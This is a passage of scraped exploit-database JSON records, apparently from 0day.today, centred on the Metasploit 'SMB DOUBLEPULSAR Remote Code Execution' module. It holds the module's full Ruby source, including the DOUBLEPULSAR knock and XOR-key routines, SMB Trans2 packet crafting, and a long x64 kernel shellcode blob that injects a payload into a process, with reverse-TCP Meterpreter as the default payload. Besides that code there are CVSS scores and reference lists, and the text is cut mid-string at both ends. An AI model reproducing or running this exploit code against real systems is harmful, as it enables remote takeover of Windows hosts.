\\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-31] #"}, "lastseen": "2021-10-30T23:12:04", "differentElements": ["sourceData"], "edition": 60}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "116b76e777723d2231df06a2ff229420", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-01T00:13:44", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T00:13:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-01T00:13:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" 